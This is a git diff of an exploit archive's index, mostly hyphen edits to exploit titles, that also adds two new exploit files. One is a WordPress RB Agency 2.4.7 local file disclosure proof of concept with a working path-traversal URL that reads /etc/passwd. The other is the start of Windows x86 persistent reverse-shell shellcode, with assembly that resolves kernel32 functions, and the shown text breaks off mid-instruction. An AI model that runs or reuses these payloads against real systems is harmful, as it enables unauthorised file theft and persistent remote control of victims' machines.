Research",multiple,dos,0 +39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 +39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV",2016-01-04,"Google Security Research",multiple,dos,0 -39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack-Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 +39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 39166,platforms/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)",2016-01-05,rebel,linux,local,0 39167,platforms/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80 39168,platforms/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,php,webapps,80 @@ -35531,6 +35535,7 @@ id,file,description,date,author,platform,type,port 39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 39291,platforms/php/webapps/39291.txt,"Wordpress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 +40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (64bit) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute-force",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 @@ -35559,17 +35564,17 @@ id,file,description,date,author,platform,type,port 39318,platforms/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Function Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote,0 39319,platforms/php/webapps/39319.txt,"Wordpress Booking Calendar Contact Form Plugin 1.1.23 - Shortcode SQL Injection",2016-01-26,"i0akiN SEC-LABORATORY",php,webapps,80 39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 -39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0 +39321,platforms/multiple/dos/39321.txt,"pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39322,platforms/multiple/dos/39322.txt,"pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39323,platforms/multiple/dos/39323.txt,"Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0 39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 -39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 +39331,platforms/windows/dos/39331.pl,"TFTPD32 and Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39333,platforms/php/webapps/39333.html,"Wordpress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 @@ -35683,7 +35688,7 @@ id,file,description,date,author,platform,type,port 39451,platforms/php/webapps/39451.txt,"Wordpress ALO EasyMail Newsletter Plugin 2.6.01 - Cross-Site Request Forgery",2016-02-16,"Mohsen Lotfi",php,webapps,80 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39453,platforms/php/webapps/39453.txt,"phpMyBackupPro 2.5 - Remote Command Execution / Cross-Site Request Forgery",2016-02-16,hyp3rlinx,php,webapps,0 -39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 +39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - 'save_email.php' Arbitrary File Upload",2016-02-17,HaHwul,multiple,webapps,0 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80 39458,platforms/php/webapps/39458.txt,"OCS Inventory NG 2.2 - SQL Injection",2016-02-17,Ephreet,php,webapps,0 @@ -35716,11 +35721,11 @@ id,file,description,date,author,platform,type,port 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",json,webapps,8443 39489,platforms/php/webapps/39489.py,"Wordpress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80 -39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0 -39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 -39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 -39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 -39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0 +39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 +39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 @@ -35851,13 +35856,13 @@ id,file,description,date,author,platform,type,port 39634,platforms/multiple/dos/39634.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2",2016-03-30,"Francis Provencher",multiple,dos,0 39635,platforms/multiple/dos/39635.txt,"Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80 -39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap-Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 +39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution",2016-03-30,Metasploit,php,remote,80 39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - Cross-Site Request Forgery (Add Admin) Exploit",2016-03-31,LiquidWorm,hardware,webapps,80 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 -39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 +39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"Wordpress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 @@ -35952,7 +35957,7 @@ id,file,description,date,author,platform,type,port 39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80 39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80 39747,platforms/linux/dos/39747.py,"Rough Auditing Tool for Security (RATS) 2.3 - Array Out of Block Crash",2016-04-29,"David Silveiro",linux,dos,0 -39748,platforms/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack-Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos,0 +39748,platforms/multiple/dos/39748.txt,"Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow",2016-04-29,"Google Security Research",multiple,dos,0 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80 @@ -35967,7 +35972,7 @@ id,file,description,date,author,platform,type,port 39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80 39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0 +39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0 39767,platforms/multiple/dos/39767.txt,"ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0 @@ -36012,9 +36017,9 @@ id,file,description,date,author,platform,type,port 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 39883,platforms/php/webapps/39883.txt,"Wordpress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 -39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 +39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 -39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 +39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0 @@ -36035,7 +36040,7 @@ id,file,description,date,author,platform,type,port 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 39832,platforms/windows/dos/39832.txt,"Windows - gdi32.dll Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 39833,platforms/windows/dos/39833.txt,"Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39834,platforms/multiple/dos/39834.txt,"Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 +39834,platforms/multiple/dos/39834.txt,"Windows - gdi32.dll Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection",2016-05-17,Metasploit,multiple,remote,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 @@ -36059,11 +36064,11 @@ id,file,description,date,author,platform,type,port 39856,platforms/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80 39857,platforms/windows/dos/39857.txt,"Micro Focus Rumba+ 9.4 - Multiple Stack Buffer Overflow Vulnerabilities",2016-05-26,LiquidWorm,windows,dos,0 39858,platforms/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",windows,remote,0 -39859,platforms/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap-Based Buffer Overflow",2016-05-26,"Google Security Research",multiple,dos,0 -39860,platforms/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap-Based Overreads",2016-05-26,"Google Security Research",multiple,dos,0 -39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 -39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 -39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 +39859,platforms/multiple/dos/39859.txt,"Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow",2016-05-26,"Google Security Research",multiple,dos,0 +39860,platforms/multiple/dos/39860.txt,"Graphite2 - GlyphCache::Loader Heap Based Overreads",2016-05-26,"Google Security Research",multiple,dos,0 +39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 +39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 +39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80 40059,platforms/php/webapps/40059.txt,"CIMA DocuClass ECM - Multiple Vulnerabilities",2016-07-06,"Karn Ganeshen",php,webapps,80 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0 @@ -36138,7 +36143,7 @@ id,file,description,date,author,platform,type,port 39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - Remote Code Execution with API JSON-RPC",2016-06-13,"Alexander Gurin",php,webapps,80 39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0 39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0 -39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 +39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0 39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 @@ -36184,7 +36189,7 @@ id,file,description,date,author,platform,type,port 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 39989,platforms/php/webapps/39989.txt,"Joomla Publisher Pro (com_publisher) Component - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 -39990,platforms/windows/dos/39990.txt,"Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 +39990,platforms/windows/dos/39990.txt,"Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39991,platforms/windows/dos/39991.txt,"Windows Kernel - ATMFD.dll NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 39993,platforms/win_x86/dos/39993.txt,"Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos,0 @@ -36406,7 +36411,7 @@ id,file,description,date,author,platform,type,port 40254,platforms/cgi/webapps/40254.txt,"SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure",2016-08-17,"Yakir Wizman",cgi,webapps,80 40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 -40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap-Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 +40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Shadow Brokers",hardware,remote,161 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80 @@ -36443,9 +36448,9 @@ id,file,description,date,author,platform,type,port 40295,platforms/php/webapps/40295.txt,"Wordpress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0 -40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 +40313,platforms/php/dos/40313.php,"PHP 5.0.0 - 'imap_mail()' Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 40314,platforms/php/dos/40314.php,"PHP 5.0.0 - hw_docbyanchor() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 -40315,platforms/php/dos/40315.php,"PHP 5.0.0 - html_doc_file() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 +40315,platforms/php/dos/40315.php,"PHP 5.0.0 - 'html_doc_file()' Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 40316,platforms/php/dos/40316.php,"PHP 5.0.0 - 'snmpwalkoid()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40317,platforms/php/dos/40317.php,"PHP 5.0.0 - 'fbird_[p]connect()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40318,platforms/php/dos/40318.php,"PHP 5.0.0 - 'snmpwalk()' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 diff --git a/platforms/php/webapps/40333.txt b/platforms/php/webapps/40333.txt new file mode 100755 index 000000000..3122e3892 --- /dev/null +++ b/platforms/php/webapps/40333.txt @@ -0,0 +1,24 @@ +###################### +# Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure +# Exploit Author : Persian Hack Team +# Vendor Homepage : http://rbplugin.com/ +# Category [ Webapps ] +# Tested on [ Win ] +# Version : 2.4.7 +# Date 2016/09/03 +###################### + +PoC +The Vulnerable page is +/ext/forcedownload.php + +http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd +Youtube:https://youtu.be/5kE8Xt-My9A + + +###################### +# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com +# B3li3v3 M3 I will n3v3r St0p +# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members +# Homepage : http://persian-team.ir +###################### \ No newline at end of file diff --git a/platforms/win_x86/shellcode/40334.c b/platforms/win_x86/shellcode/40334.c new file mode 100755 index 000000000..db3df7d67 --- /dev/null +++ b/platforms/win_x86/shellcode/40334.c @@ -0,0 +1,607 @@ +/* + # Title : Windows x86 persistent reverse shell tcp + # Author : Roziul Hasan Khan Shifat + # Date : 04-09-2016 + # Tested on : Windows 7 x86 +*/ + + +/* +Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent +*/ + + +/* +section .text + global _start +_start: + + +xor ecx,ecx +mov eax,[fs:ecx+0x30] ;PEB +mov eax,[eax+0xc] ;PEB->Ldr +mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList +lodsd +xchg esi,eax +lodsd +mov ecx,[eax+0x10] ;kernel32.dll + + +mov ebx,[ecx+0x3c] ;DOS->elf_anew +add ebx,ecx ;PE HEADER +mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress +add ebx,ecx ;IMAGE_EXPORT_DIRECTORY + +mov esi,[ebx+0x20] ;AddressOfNames +add esi,ecx + + +xor edx,edx + +g: + +inc edx +lodsd +add eax,ecx +cmp dword [eax],'GetP' +jne g +cmp dword [eax+4],'rocA' +jne g +cmp dword [eax+8],'ddre' +jne g + +mov esi,[ebx+0x1c] ;AddressOfFunctions +add esi,ecx + + +mov edx,[esi+edx*4] +add edx,ecx ;GetProcAddress() + +xor eax,eax +push eax + +sub esp,24 + +lea esi,[esp] + +mov [esi],dword edx ;GetProcAddress() at offset 0 +mov edi,ecx ;kernel32.dll + +;------------------------------ +;finding address of CreateProcessA() + +push 0x42424173 +mov [esp+2],word ax +push 0x7365636f +push 0x72506574 +push 0x61657243 + +lea eax,[esp] + +push eax +push ecx + +call edx +;---------------------------- +add esp,16 + +mov [esi+4],dword eax ;CreateProcessA() at offset 4 +;----------------------------- +;finding address of ExitProcess() +xor ecx,ecx +push 0x41737365 +mov [esp+3],byte cl +push 0x636f7250 +push 0x74697845 + +lea ecx,[esp] + +push ecx +push edi + +call 